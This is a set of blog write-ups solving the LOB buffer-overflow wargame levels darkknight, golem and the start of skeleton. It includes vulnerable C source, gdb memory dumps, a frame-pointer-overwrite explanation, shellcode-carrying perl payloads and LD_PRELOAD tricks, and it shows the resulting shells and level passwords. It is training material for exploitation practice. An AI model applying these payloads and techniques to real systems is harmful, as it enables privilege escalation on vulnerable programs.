30 posts in 'Wargame'

  1. 2014.02.20 golem -> darkknight
  2. 2014.02.20 skeleton -> golem
  3. 2014.02.20 vampire -> skeleton
  4. 2014.02.20 troll -> vampire
  5. 2014.02.20 orge -> troll
  6. 2014.02.20 darkelf->orge
  7. 2014.02.20 wolfman -> darkelf
  8. 2014.02.20 orc -> wolfman
  9. 2014.02.20 gremlin -> cobolt
  10. 2014.02.20 gate -> gremlin


First, the source:

[golem@localhost golem]$ cat darkknight.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkknight
        - FPO
*/

#include <stdio.h>
#include <stdlib.h>

void problem_child(char *src)
{
        char buffer[40];
        strncpy(buffer, src, 41);
        printf("%s\n", buffer);
}

main(int argc, char *argv[])
{
        if(argc<2){
                printf("argv error\n");
                exit(0);
        }

        problem_child(argv[1]);
}



The hint at the top says FPO, i.e. Frame Pointer Overwrite: the overflow reaches one byte of the saved frame pointer (sfp), not the return address. (So not SFPO.)


0x8048440 <problem_child>:      push   %ebp
0x8048441 <problem_child+1>:    mov    %esp,%ebp


These two instructions are the function prologue: they save the caller's ebp (the sfp) on the stack.

We are inside problem_child, called from main; the saved ebp is what restores main's frame pointer when problem_child returns.

problem_child returns with a corrupted sfp, because its epilogue, leave; ret, executes

mov %ebp,%esp
pop %ebp

That is, esp is set to ebp, and the saved value is popped into ebp, which leaves esp 4 bytes higher. problem_child's ret then returns into main normally, but main's ebp now holds the corrupted value. When main's own leave; ret runs, esp becomes the corrupted sfp, pop %ebp moves it up by 4, and ret takes the dword at (corrupted sfp)+4 as main's return address.

So the saved ebp in problem_child's frame (main's sfp as seen from problem_child) + 4 is where main's return address is read from.

And because strncpy(buffer, src, 41) copies 41 bytes into a 40-byte buffer, exactly one byte, the low byte of the sfp, can be overwritten here.
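To make the sfp+4 reasoning concrete, here is an added example (not code from the original post) that models the frame from the gdb session below in C and emulates the two leave; ret sequences. The addresses are the ones seen in gdb (buffer at 0xbffff984, saved ebp at 0xbffff9ac, shellcode at 0xbffffdd1 as in the exploit line); the memory contents around them are constructed, and the model skips main's own code after the call, which is accurate here because main only runs leave; ret once problem_child returns.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Addresses are the ones observed in the gdb session; the memory contents
 * are a constructed model of that frame, not a dump. */
#define WIN_BASE    0xbffff900u   /* modelled window: 0xbffff900..0xbffff9ff */
#define WIN_SIZE    0x100u
#define BUF_ADDR    0xbffff984u   /* problem_child's 40-byte buffer */
#define SFP_ADDR    0xbffff9acu   /* saved ebp (main's frame pointer) */
#define RET_ADDR    0xbffff9b0u   /* problem_child's return address */
#define MAIN_EBP    0xbffff9d8u   /* value the sfp held before the overflow */
#define MAIN_RET    0x0804849eu   /* main+46, where problem_child returns to */
#define SHELLCODE   0xbffffdd1u   /* env-var shellcode address used in the exploit */
#define UNMAPPED    0xffffffffu   /* marker: read outside the modelled window */

static uint8_t win[WIN_SIZE];

static uint32_t rd32(uint32_t a)
{
    if (a < WIN_BASE || a + 4 > WIN_BASE + WIN_SIZE)
        return UNMAPPED;
    uint32_t o = a - WIN_BASE;
    return (uint32_t)win[o] | (uint32_t)win[o + 1] << 8 |
           (uint32_t)win[o + 2] << 16 | (uint32_t)win[o + 3] << 24;
}

static void wr32(uint32_t a, uint32_t v)
{
    uint32_t o = a - WIN_BASE;
    win[o] = v & 0xff;            win[o + 1] = (v >> 8) & 0xff;
    win[o + 2] = (v >> 16) & 0xff; win[o + 3] = v >> 24;
}

/* argv[1] exactly as the exploit builds it: ten little-endian copies of the
 * shellcode address followed by the byte that replaces the sfp's low byte. */
size_t build_payload(uint8_t out[41], uint32_t target, uint8_t sfp_low)
{
    for (int i = 0; i < 10; i++) {
        out[4 * i]     = target & 0xff;
        out[4 * i + 1] = (target >> 8) & 0xff;
        out[4 * i + 2] = (target >> 16) & 0xff;
        out[4 * i + 3] = target >> 24;
    }
    out[40] = sfp_low;
    return 41;
}

/* Emulate strncpy(buffer, argv[1], 41), then problem_child's and main's
 * "leave; ret".  Returns the address main's ret jumps to. */
uint32_t run_darkknight(uint8_t sfp_low)
{
    uint8_t payload[41];
    uint32_t esp, ebp, eip;

    memset(win, 0, sizeof win);
    wr32(SFP_ADDR, MAIN_EBP);
    wr32(RET_ADDR, MAIN_RET);

    /* 41 bytes into a 40-byte buffer: the 41st byte hits the sfp's low byte */
    build_payload(payload, SHELLCODE, sfp_low);
    memcpy(win + (BUF_ADDR - WIN_BASE), payload, sizeof payload);

    /* problem_child: leave; ret */
    ebp = SFP_ADDR;
    esp = ebp;                    /* mov %ebp,%esp */
    ebp = rd32(esp); esp += 4;    /* pop %ebp: main's ebp is now the corrupted sfp */
    eip = rd32(esp); esp += 4;    /* ret: back into main */
    if (eip != MAIN_RET)
        return UNMAPPED;

    /* main: leave; ret (main does nothing else after the call) */
    esp = ebp;                    /* mov %ebp,%esp: esp = corrupted sfp */
    ebp = rd32(esp); esp += 4;    /* pop %ebp */
    eip = rd32(esp);              /* ret: pops the dword at corrupted sfp + 4 */
    return eip;
}

/* How many of the 256 possible last bytes divert main's ret into the shellcode? */
int count_working_bytes(void)
{
    int n = 0;
    for (int b = 0; b < 256; b++)
        if (run_darkknight((uint8_t)b) == SHELLCODE)
            n++;
    return n;
}

int main(void)
{
    printf("sfp low byte 0x84 -> main returns to %#x\n", run_darkknight(0x84));
    printf("sfp low byte 0xa4 -> main returns to %#x\n", run_darkknight(0xa4));
    printf("sfp low byte 0x00 -> main returns to %#x\n", run_darkknight(0x00));
    printf("%d of 256 last bytes reach the shellcode\n", count_working_bytes());
    return 0;
}
```

Running it shows that only ten values work, 0x80, 0x84, ..., 0xa4: sfp+4 has to land on a 4-byte-aligned copy of the address inside the buffer, which is why both 0x84 and 0xa4 succeed, why a misaligned byte such as 0x82 yields a rotated garbage dword, and why 0xa8 makes ret read the sfp slot itself.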


(gdb) disas problem_child
Dump of assembler code for function problem_child:
0x8048440 <problem_child>:      push   %ebp
0x8048441 <problem_child+1>:    mov    %esp,%ebp
0x8048443 <problem_child+3>:    sub    $0x28,%esp
0x8048446 <problem_child+6>:    push   $0x29
0x8048448 <problem_child+8>:    mov    0x8(%ebp),%eax
0x804844b <problem_child+11>:   push   %eax
0x804844c <problem_child+12>:   lea    0xffffffd8(%ebp),%eax
0x804844f <problem_child+15>:   push   %eax
0x8048450 <problem_child+16>:   call   0x8048374 <strncpy>
0x8048455 <problem_child+21>:   add    $0xc,%esp
0x8048458 <problem_child+24>:   lea    0xffffffd8(%ebp),%eax
0x804845b <problem_child+27>:   push   %eax
0x804845c <problem_child+28>:   push   $0x8048500
0x8048461 <problem_child+33>:   call   0x8048354 <printf>
0x8048466 <problem_child+38>:   add    $0x8,%esp
0x8048469 <problem_child+41>:   leave
0x804846a <problem_child+42>:   ret
0x804846b <problem_child+43>:   nop
End of assembler dump.
(gdb) Quit
(gdb) b *problem_child+38
Breakpoint 2 at 0x8048466
(gdb) r `perl -e 'print "A"x40'`
Starting program: /home/golem/tmp/darkknight `perl -e 'print "A"x40'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, 0x8048466 in problem_child ()
(gdb) x/100x $ebp
0xbffff9ac:     0xbffff900      0x0804849e      0xbffffb2f      0xbffff9d8
0xbffff9bc:     0x400309cb      0x00000002      0xbffffa04      0xbffffa10
0xbffff9cc:     0x40013868      0x00000002      0x08048390      0x00000000
0xbffff9dc:     0x080483b1      0x0804846c      0x00000002      0xbffffa04
0xbffff9ec:     0x080482e4      0x080484dc      0x4000ae60      0xbffff9fc
0xbffff9fc:     0x40013e90      0x00000002      0xbffffb14      0xbffffb2f
0xbffffa0c:     0x00000000      0xbffffb58      0xbffffb7a      0xbffffb84
0xbffffa1c:     0xbffffb92      0xbffffbb1      0xbffffbbf      0xbffffbd8
0xbffffa2c:     0xbffffbf3      0xbffffc12      0xbffffc1d      0xbffffc2b
0xbffffa3c:     0xbffffc6c      0xbffffc7f      0xbffffc90      0xbffffca5
0xbffffa4c:     0xbffffcae      0xbffffcbe      0xbffffcc9      0xbffffdbd
0xbffffa5c:     0xbffffdda      0xbffffde6      0xbffffdf1      0xbffffe02
0xbffffa6c:     0xbffffe16      0xbffffe1e      0x00000000      0x00000003
0xbffffa7c:     0x08048034      0x00000004      0x00000020      0x00000005
0xbffffa8c:     0x00000006      0x00000006      0x00001000      0x00000007
0xbffffa9c:     0x40000000      0x00000008      0x00000000      0x00000009
0xbffffaac:     0x08048390      0x0000000b      0x000001ff      0x0000000c
0xbffffabc:     0x000001ff      0x0000000d      0x000001ff      0x0000000e
0xbffffacc:     0x000001ff      0x00000010      0x0febfbff      0x0000000f
0xbffffadc:     0xbffffb0f      0x00000000      0x00000000      0x00000000
0xbffffaec:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffafc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb0c:     0x69000000      0x00363836      0x6d6f682f      0x6f672f65
0xbffffb1c:     0x2f6d656c      0x2f706d74      0x6b726164      0x67696e6b
0xbffffb2c:     0x41007468      0x41414141      0x41414141      0x41414141
(gdb)
0xbffffb3c:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffb4c:     0x41414141      0x41414141      0x00414141      0x5353454c


The attacker's string is visible at around 0xbffffb2f (that is the argv[1] copy); the copy that matters is the one strncpy placed in buffer, just below ebp.

Since only one byte of the sfp can be changed, the idea is to point the sfp at a spot where addresses of the attacker's data are stored, so that sfp+4 holds one of them. ebp is 0xbffff9ac, so the corrupted sfp can be anything in 0xbffff900 ~ 0xbffff9ff.


(gdb) x/100x $ebp-200
0xbffff8e4:     0x4001ad70      0x400143e0      0x00000003      0x40014650
0xbffff8f4:     0x00000001      0xbffff910      0x08048170      0x400140d4
0xbffff904:     0x078e530f      0xbffff98c      0xbffff944      0x4000a7fd
0xbffff914:     0x400143d0      0x400146b0      0x00000007      0x4000a74e
0xbffff924:     0x401081ec      0x4000ae60      0xbffffa04      0x400143e0
0xbffff934:     0x40021df0      0x401088c0      0x4002982c      0x40021df0
0xbffff944:     0xbffff974      0x4000a970      0xbffffb58      0xbffff9ac
0xbffff954:     0x4005d920      0x400143e0      0xbffff974      0x40066070
0xbffff964:     0x40106980      0x08048500      0xbffff984      0x401081ec
0xbffff974:     0xbffff9ac      0x08048466      0x08048500      0xbffff984
0xbffff984:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff994:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff9a4:     0x41414141      0x41414141      0xbffff900      0x0804849e
0xbffff9b4:     0xbffffb2f      0xbffff9d8      0x400309cb      0x00000002
0xbffff9c4:     0xbffffa04      0xbffffa10      0x40013868      0x00000002
0xbffff9d4:     0x08048390      0x00000000      0x080483b1      0x0804846c
0xbffff9e4:     0x00000002      0xbffffa04      0x080482e4      0x080484dc
0xbffff9f4:     0x4000ae60      0xbffff9fc      0x40013e90      0x00000002
0xbffffa04:     0xbffffb14      0xbffffb2f      0x00000000      0xbffffb58
0xbffffa14:     0xbffffb7a      0xbffffb84      0xbffffb92      0xbffffbb1
0xbffffa24:     0xbffffbbf      0xbffffbd8      0xbffffbf3      0xbffffc12
0xbffffa34:     0xbffffc1d      0xbffffc2b      0xbffffc6c      0xbffffc7f
0xbffffa44:     0xbffffc90      0xbffffca5      0xbffffcae      0xbffffcbe
0xbffffa54:     0xbffffcc9      0xbffffdbd      0xbffffdda      0xbffffde6
0xbffffa64:     0xbffffdf1      0xbffffe02      0xbffffe16      0xbffffe1e
(gdb)


The highlighted region (0xbffff984 ~ 0xbffff9ab, the 40-byte buffer) is the input. Instead of 0x41414141, fill it with ten copies of the address of an environment variable holding the shellcode, then let the 41st byte overwrite the low byte of the sfp so that sfp+4 falls on one of those copies: 0x84 in this gdb session, and the run below uses 0xa4, which also lands inside the buffer.


[golem@localhost golem]$ ./darkknight `perl -e 'print "\xd1\xfd\xff\xbf"x10,"\xa4"'`
Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿¤uy¿ž-uy¿euy¿E  @
bash$ my-pass
euid = 512
new attacker
bash$


Other posts in 'Wargame > LOB (Redhat9)'

bugbear -> giant  (0) 2014.02.20
darkknight -> bugbear  (0) 2014.02.20
skeleton -> golem  (0) 2014.02.20
vampire -> skeleton  (0) 2014.02.20
troll -> vampire  (0) 2014.02.20
Posted by windowhan

The hint for this level is to use LD_PRELOAD.

LD_PRELOAD is an environment variable naming shared libraries that the dynamic loader maps before any others.

ld.so processes that path before main runs, and the path string it works with ends up on the stack below main's frame, at a lower address than anything golem later wipes.

LD_PRELOAD is normally used to hook functions of the program being run; here it serves only to leave a filename, i.e. arbitrary bytes, on the stack.


[skeleton@localhost tmp]$ vi `perl -e 'print "A"x100,".c"'`

[skeleton@localhost tmp]$ gcc -o `perl -e 'print "A"x100,".so"'` `perl -e 'print "A"x100,".c"'` -fPIC -shared

[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "A"x100,".so"'`

0xbffff5c0:     0x00000002      0x40023fd0      0x00000000      0x00000000
0xbffff5d0:     0x40013868      0x40000814      0x400041b0      0x00000001
0xbffff5e0:     0xbffff5ec      0x40001528      0x000002c8      0x00000000
0xbffff5f0:     0x080482d0      0x00000000      0x00000001      0x40000824
0xbffff600:     0xbffff60c      0x400075bb      0x40017000      0x00002fb2
0xbffff610:     0x40013868      0xbffff7c4      0x4000380e      0x40014450
0xbffff620:     0x6d6f682f      0x6b732f65      0x74656c65      0x742f6e6f
0xbffff630:     0x412f706d      0x41414141      0x41414141      0x41414141
0xbffff640:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff650:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff660:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff670:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff680:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff690:     0x41414141      0x2e414141      0x40006f73      0x40013868
0xbffff6a0:     0x4000220c      0xbffffbc7      0x00000000      0x00000000
0xbffff6b0:     0x00000000      0x00000000      0x40014a00      0x00000000
0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000006
0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6f0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff700:     0x00000000      0x00000001      0x00000000      0x00000001
0xbffff710:     0xbffff61c      0x00060000      0x00000000      0x00000000
0xbffff720:     0x00000000      0x00000001      0x00000000      0x00000000


Even after everything above the frame is wiped out, this survives.


[skeleton@localhost tmp]$ gcc -o `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"'` `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'` -fPIC -shared

[skeleton@localhost tmp]$ vi `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'`

[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"'`

[skeleton@localhost tmp]$ gdb -q ./golem
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>:       push   %ebp
0x8048471 <main+1>:     mov    %esp,%ebp
0x8048473 <main+3>:     sub    $0x2c,%esp
0x8048476 <main+6>:     cmpl   $0x1,0x8(%ebp)
0x804847a <main+10>:    jg     0x8048493 <main+35>
0x804847c <main+12>:    push   $0x8048570
0x8048481 <main+17>:    call   0x8048378 <printf>
0x8048486 <main+22>:    add    $0x4,%esp
0x8048489 <main+25>:    push   $0x0
0x804848b <main+27>:    call   0x8048388 <exit>
0x8048490 <main+32>:    add    $0x4,%esp
0x8048493 <main+35>:    mov    0xc(%ebp),%eax
0x8048496 <main+38>:    add    $0x4,%eax
0x8048499 <main+41>:    mov    (%eax),%edx
0x804849b <main+43>:    add    $0x2f,%edx
0x804849e <main+46>:    cmpb   $0xbf,(%edx)
0x80484a1 <main+49>:    je     0x80484c0 <main+80>
0x80484a3 <main+51>:    push   $0x804857c
0x80484a8 <main+56>:    call   0x8048378 <printf>
0x80484ad <main+61>:    add    $0x4,%esp
0x80484b0 <main+64>:    push   $0x0
0x80484b2 <main+66>:    call   0x8048388 <exit>
0x80484b7 <main+71>:    add    $0x4,%esp
0x80484ba <main+74>:    lea    0x0(%esi),%esi
0x80484c0 <main+80>:    mov    0xc(%ebp),%eax
0x80484c3 <main+83>:    add    $0x4,%eax
0x80484c6 <main+86>:    mov    (%eax),%edx
0x80484c8 <main+88>:    push   %edx
0x80484c9 <main+89>:    lea    0xffffffd8(%ebp),%eax
0x80484cc <main+92>:    push   %eax
0x80484cd <main+93>:    call   0x80483a8 <strcpy>
0x80484d2 <main+98>:    add    $0x8,%esp
0x80484d5 <main+101>:   lea    0xffffffd8(%ebp),%eax
0x80484d8 <main+104>:   push   %eax
0x80484d9 <main+105>:   push   $0x8048599
0x80484de <main+110>:   call   0x8048378 <printf>
0x80484e3 <main+115>:   add    $0x8,%esp
0x80484e6 <main+118>:   push   $0x2c
0x80484e8 <main+120>:   push   $0x0
0x80484ea <main+122>:   lea    0xffffffd8(%ebp),%eax
---Type <return> to continue, or q <return> to quit---
0x80484ed <main+125>:   push   %eax
0x80484ee <main+126>:   call   0x8048398 <memset>
0x80484f3 <main+131>:   add    $0xc,%esp
0x80484f6 <main+134>:   lea    0xffffffd8(%ebp),%eax
0x80484f9 <main+137>:   mov    $0xbfffffcf,%edx
0x80484fe <main+142>:   mov    %edx,%ecx
0x8048500 <main+144>:   sub    %eax,%ecx
0x8048502 <main+146>:   mov    %ecx,%eax
0x8048504 <main+148>:   push   %eax
0x8048505 <main+149>:   push   $0x0
0x8048507 <main+151>:   lea    0xffffffd8(%ebp),%eax
0x804850a <main+154>:   lea    0x30(%eax),%edx
0x804850d <main+157>:   push   %edx
0x804850e <main+158>:   call   0x8048398 <memset>
0x8048513 <main+163>:   add    $0xc,%esp
0x8048516 <main+166>:   leave
0x8048517 <main+167>:   ret
0x8048518 <main+168>:   nop
0x8048519 <main+169>:   nop
0x804851a <main+170>:   nop
0x804851b <main+171>:   nop
0x804851c <main+172>:   nop
0x804851d <main+173>:   nop
0x804851e <main+174>:   nop
0x804851f <main+175>:   nop
End of assembler dump.
(gdb)
(gdb) b *main+167
Breakpoint 1 at 0x8048517
(gdb) r `perl -e 'print "\xbf"x48'`
Starting program: /home/skeleton/tmp/./golem `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Breakpoint 1, 0x8048517 in main ()
(gdb) x/1000x 0xbffff000
0xbffff000:     0x00000583      0x000006de      0x00000432      0x0000013f
0xbffff010:     0x0000016e      0x000002f1      0x00000000      0x00000420
0xbffff020:     0x000006c0      0x0000052e      0x0000046c      0x00000000
0xbffff030:     0x000004cd      0x00000660      0x00000000      0x000001af
0xbffff040:     0x0000048a      0x4002bb0e      0xbffff118      0x400081e6
0xbffff050:     0x4002bad5      0x4002bad5      0x40013868      0x40014930
0xbffff060:     0x0000598c      0x00000259      0x00000000      0x00000591
0xbffff070:     0x000006ea      0x000006ec      0x0000028f      0x000005bb
0xbffff080:     0x000006ce      0x00005450      0x000003c7      0x000006c2
0xbffff090:     0x00000000      0x0000070b      0x400221c0      0x00000545
0xbffff0a0:     0x40023fd0      0x4001cd70      0x40014930      0x00000004
0xbffff0b0:     0x40014ba0      0x00000002      0xbffff0d0      0x400221c0
0xbffff0c0:     0x40014b34      0x03c40f19      0xbffff14c      0x4002995c
0xbffff0d0:     0x400221c0      0x40014930      0x4002bad5      0x4002bad5
0xbffff0e0:     0x40013868      0x40014930      0x0000590a      0x0000065b
0xbffff0f0:     0x00000561      0x000005cc      0x00000000      0x40001402
0xbffff100:     0xbffff1d0      0x40008134      0x40000c7d      0x40024f23
0xbffff110:     0x40013868      0x40014930      0x00000f53      0x4000a7fd
0xbffff120:     0x40014920      0x40014c58      0x00000007      0x4000a74e
0xbffff130:     0x4010a1ec      0xbffff1d1      0x00000000      0x00000180
0xbffff140:     0x400221c0      0x4010a710      0x00000000      0x400221c0
0xbffff150:     0x40000474      0x00000000      0x40000824      0x400002f4
0xbffff160:     0x40013c00      0x00000004      0x40014ba0      0x00000004
0xbffff170:     0xbffff188      0x4001dd60      0x40014b3c      0x056e90c5
0xbffff180:     0xbffff204      0x40024f23      0x4001dd60      0x40014930
0xbffff190:     0x000000bd      0x4002bb0e      0xbffff268      0x400081e6
0xbffff1a0:     0x4002bad5      0x4002bad5      0x40013868      0x40014930
0xbffff1b0:     0x0000187f      0x00000001      0x4001fe70      0x00000310
0xbffff1c0:     0x40023fd0      0x4001cd70      0x40014930      0x00000004
0xbffff1d0:     0xbffff208      0x4000a7fd      0x40014920      0x40014c58
0xbffff1e0:     0x40001402      0xbffff2b4      0x40008134      0x40000ec9
0xbffff1f0:     0x40025713      0x40013868      0x40014930      0x00001743
0xbffff200:     0x40024f23      0x4001dd60      0xbffff248      0x4000a970
0xbffff210:     0x40017000      0x40108980      0x400c0b00      0x00000000
0xbffff220:     0x40000ec9      0x400707e4      0x00000001      0x00000000
0xbffff230:     0x00000031      0x40000664      0x00000000      0x40000824
0xbffff240:     0x400002f4      0x40013c00      0x00000004      0x40014ba0
0xbffff250:     0x00000004      0xbffff26c      0x4001e4f0      0x40014b3c
0xbffff260:     0x00dc28f5      0xbffff2e8      0x40025713      0x4001e4f0
0xbffff270:     0x40014930      0x40108980      0x40017000      0x00000031
0xbffff280:     0x4010a1ec      0x40108980      0xbffff2a8      0x4006fa3e
---Type <return> to continue, or q <return> to quit---
0xbffff290:     0x40108980      0x40017000      0x00000031      0x4010a1ec
0xbffff2a0:     0x00000001      0x40108980      0xbffff2bc      0x400711c7
0xbffff2b0:     0x40108980      0xbffff2ec      0x4000a7fd      0x40014920
0xbffff2c0:     0x40014c58      0x00000007      0x4000a74e      0x4010a1ec
0xbffff2d0:     0x0804859c      0x00000001      0x40014930      0x4001e4f0
0xbffff2e0:     0x4010a320      0x40025713      0x4001e4f0      0xbffff9a4
0xbffff2f0:     0x4000a970      0x40108980      0x00000400      0x4006c2e4
0xbffff300:     0x40014930      0xbffff9a4      0x4006428b      0x40108980
0xbffff310:     0x4010a1ec      0x4000ae60      0xbffffa44      0x00000000
0xbffff320:     0x0000675b      0x000081a4      0x00000001      0x00000000
0xbffff330:     0x00000000      0x00000808      0x00000000      0x00000000
0xbffff340:     0x00008561      0x000081ed      0x00000001      0x00000000
0xbffff350:     0x40001402      0xbffff424      0x400081e6      0x400013e1
0xbffff360:     0x400013e1      0x40013868      0x400013a5      0x40000824
0xbffff370:     0x400013d3      0x40013c00      0x40014b90      0x0000000e
0xbffff380:     0x40013e80      0x0804859c      0x250014c4      0x00000000
0xbffff390:     0x00000001      0x4002bad5      0x40001353      0x00000000
0xbffff3a0:     0xbffff428      0x40000814      0x00000052      0x40000824
0xbffff3b0:     0x400002f4      0x40013c00      0x00000004      0x40014ba0
0xbffff3c0:     0x00000003      0xbffff3dc      0x40000814      0x400140d4
0xbffff3d0:     0x0b725f23      0xbffff4b8      0x400013a5      0x40000814
0xbffff3e0:     0x40013c00      0x400002f4      0x40013c00      0x00000000
0xbffff3f0:     0x00000000      0x00000004      0x40014ba0      0x00000004
0xbffff400:     0xbffff420      0x40000674      0x400140d8      0x01ee5739
0xbffff410:     0xbffff4b8      0x40000edc      0x40013868      0x40013c00
0xbffff420:     0x00000000      0xbffff4e8      0x4000966a      0x080480f4
0xbffff430:     0x40014cf8      0x00000007      0x40013868      0x00000000
0xbffff440:     0x40013e70      0x40000814      0x40009c50      0x00005207
0xbffff450:     0x4001a0dc      0x4001a0dc      0x4001a0e8      0x00000018
0xbffff460:     0x400017f4      0x00000004      0x4001a0e8      0x40013c00
0xbffff470:     0xbffff4d0      0x2073f4cc      0xffffffff      0xffffffd0
0xbffff480:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff490:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff4a0:     0xbffff9d0      0x00000002      0x40023fd0      0x40013c00
0xbffff4b0:     0x4000ba15      0x00000000      0x00000000      0x00000001
0xbffff4c0:     0xbffff9c8      0xbffff9a3      0x0804859b      0x08048599
0xbffff4d0:     0x00000031      0xffffffff      0x00000000      0x00000001
0xbffff4e0:     0x40000824      0xbffff4f0      0x400075bb      0x40017000
0xbffff4f0:     0x00002fb2      0x40013868      0xbffff734      0x4000380e
0xbffff500:     0x400144d8      0x6d6f682f      0x6b732f65      0x74656c65
0xbffff510:     0x742f6e6f      0x902f706d      0x90909090      0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffff520:     0x90909090      0x0804859c      0x90909090      0x90909090
0xbffff530:     0x90909090      0x90909090      0x00000000      0x00000000
0xbffff540:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff550:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff560:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff570:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff580:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff590:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5a0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5c0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5d0:     0x90909090      0x90909090      0x90909090      0x68909090
0xbffff5e0:     0x81cee28a      0x530cb168      0x6f6a6854      0x0168e48a
0xbffff5f0:     0x68633069      0x69743069      0xfe59146a      0x79490c0c
0xbffff600:     0xe1f741fa      0x732ec354      0x4000006f      0x40013868
0xbffff610:     0x4000220c      0xbffffb3c      0x00000000      0x00000000
0xbffff620:     0x00000000      0x00000000      0x40014b00      0x00000000
0xbffff630:     0x00000000      0x00000000      0x00000000      0x00000006
0xbffff640:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff650:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff660:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff670:     0x00000000      0x00000001      0x00000000      0x00000001
0xbffff680:     0xbffff500      0x00060000      0x00000000      0x00000000
0xbffff690:     0x00000000      0x00000001      0x00000000      0x00000000
0xbffff6a0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6b0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff6f0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff700:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff710:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff720:     0x00000000      0x00000000      0x4000f7cb      0x4000f7cb
0xbffff730:     0x40013868      0xbffff778      0x4000c84c      0x08048034
0xbffff740:     0x00000006      0xbffff774      0x40013868      0xbffff9a8
0xbffff750:     0x40013da0      0x0001fbf1      0xbffffa50      0x000001fe
0xbffff760:     0x000001fe      0x000001fe      0x000001fe      0x00000006
0xbffff770:     0x08048034      0x080483c0      0xbffff79c      0x40002179
0xbffff780:     0xbffffa40      0x4000220c      0x080483c0      0x40013868
0xbffff790:     0x00000000      0xbffff7f8      0xbffff788      0xbffffa34
0xbffff7a0:     0x400020ea      0xbffffa40      0xbffff808      0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit


[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\xbf"x44,"\x70\xf5\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿poy¿
bash$ id
uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)
bash$ my-pass
euid = 511
cup of coffee
bash$


Posted by windowhan

[vampire@localhost vampire]$ cat skeleton.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - skeleton
        - argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i, saved_argc;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        // argc saver
        saved_argc = argc;

